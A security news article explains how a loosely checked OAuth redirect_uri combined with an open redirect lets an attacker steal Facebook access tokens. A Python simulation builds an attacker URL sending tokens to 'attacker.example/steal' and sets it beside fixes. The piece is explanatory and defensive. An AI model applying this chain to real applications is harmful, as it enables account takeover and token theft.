The advent of social networking changed not only the way people interact with each other; it also raised new challenges in authenticating the rich ecosystem of third-party applications that want to interact with a user's account.
Since logging into an application with your social network's credentials is like handing your house keys to people you barely know, the Open Authorization (OAuth) standard has become increasingly popular. It mediates the interaction between end users and third-party apps without the user ever sharing a username/password combination with the app.
Researcher Nir Goldshlager found a way to hijack the access tokens of all users of a given application simply by exploiting an open redirect on the app vendor's website.
Before reading further, take a look at how the OAuth framework works. If you don't feel like reading technical documentation, here's the rundown: the application you wish to use asks for a set of permissions to interact with your account. When you accept, Facebook issues the application an access token (think of it as something like a cookie): a random string that grants temporary access to the Facebook APIs on your behalf.
The exploit abuses the "redirect_uri" parameter of the authorization request, which tells Facebook where to send the browser, token included, once you have consented. If that destination can be bent towards a malicious site the attacker controls, the token is delivered to the attacker instead of to the legitimate application.
“The attacker merely needs to locate a site redirection issue on the developer or owner's app domain, and that's it. They will be able to take the access_tokens of any user on Facebook who uses that particular app,” wrote Goldshlager on his blog. “Additionally, Facebook is powerless when it comes to fixing this issue. In fact, the developer or owner of the app needs to take responsibility for these flaws in order to avoid the potentially pernicious site redirection attacks.”
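To make the mechanism concrete, here is a small model of the flow described above, written for this article; it is not Goldshlager's proof of concept nor any code from Facebook. The app domain `app.example`, the attacker host `attacker.example`, the open-redirect endpoint `/go?next=...` and the token value are all constructed for the example. It assumes the implicit grant (`response_type=token`), in which the token rides in the URL fragment and is therefore carried along by the browser when the app's own site issues a redirect. The model shows the weak domain-level `redirect_uri` check the attack relies on beside an exact-match check, and the open redirect beside a hardened version that only honours paths on the app's own site.

```python
from typing import Callable, Optional
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Hypothetical third-party app; both values are assumptions for this example.
APP_DOMAIN = "app.example"
REGISTERED_REDIRECT_URIS = {"https://app.example/oauth/callback"}

# Constructed token value; a real one would be a random string issued by Facebook.
DEMO_TOKEN = "EXAMPLE_ACCESS_TOKEN"


def allowed_by_domain(redirect_uri: str) -> bool:
    """Weak authorization-server check: any https URL on the app's registered
    domain is accepted. This is the policy the attack relies on."""
    u = urlsplit(redirect_uri)
    return u.scheme == "https" and u.hostname == APP_DOMAIN


def allowed_by_exact_match(redirect_uri: str) -> bool:
    """Strong check: redirect_uri must equal a pre-registered URI byte for byte."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def authorize(redirect_uri: str, check: Callable[[str], bool]) -> Optional[str]:
    """Authorization endpoint after the user has consented (implicit grant):
    the token is placed in the URL fragment of the redirect target.
    Returns the Location header value, or None if redirect_uri is rejected."""
    if not check(redirect_uri):
        return None
    return f"{redirect_uri}#access_token={DEMO_TOKEN}&token_type=bearer"


def open_redirect(location: str) -> str:
    """The vulnerable endpoint on the app's site, /go?next=<url>, which sends
    the browser to any URL it is given. Browsers keep the fragment of the
    original URL when following a redirect, so the token travels with it."""
    u = urlsplit(location)
    target = parse_qs(u.query).get("next", [None])[0]
    if target is None:
        return location
    return urlunsplit(urlsplit(target)._replace(fragment=u.fragment))


def safe_redirect(location: str) -> str:
    """Hardened /go endpoint: only an absolute path on the app's own site is
    honoured; anything carrying a scheme or a host (including //host) falls
    back to the site root. The fragment still follows the browser, but now
    it can only land on the app itself."""
    u = urlsplit(location)
    target = parse_qs(u.query).get("next", ["/"])[0]
    t = urlsplit(target)
    if t.scheme or t.netloc or not t.path.startswith("/"):
        t = urlsplit("/")
    return urlunsplit(("https", APP_DOMAIN, t.path, t.query, u.fragment))


def run_attack(check: Callable[[str], bool],
               redirect_handler: Callable[[str], str]) -> str:
    """Attacker-chosen redirect_uri: a URL on the app's own domain whose
    open-redirect parameter points at the attacker's server. Returns where
    the browser (and the token in its fragment) finally ends up."""
    evil_redirect_uri = "https://app.example/go?next=https://attacker.example/steal"
    location = authorize(evil_redirect_uri, check)
    if location is None:
        return "rejected by authorization server"
    return redirect_handler(location)


if __name__ == "__main__":
    # Weak check + open redirect: the token lands on attacker.example.
    print(run_attack(allowed_by_domain, open_redirect))
    # Exact-match registration: the authorization server refuses the URI.
    print(run_attack(allowed_by_exact_match, open_redirect))
    # Weak check, but the app fixed its redirect: the token stays on app.example.
    print(run_attack(allowed_by_domain, safe_redirect))
```

Either fix on its own breaks the attack, which is the point of the quoted remark: the authorization server can tighten `redirect_uri` matching, but as long as it accepts any URL on the registered domain, the app owner's open redirect is what hands the token over, and only the app owner can close it.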
Here are a couple of things that can minimize the impact of the flaw: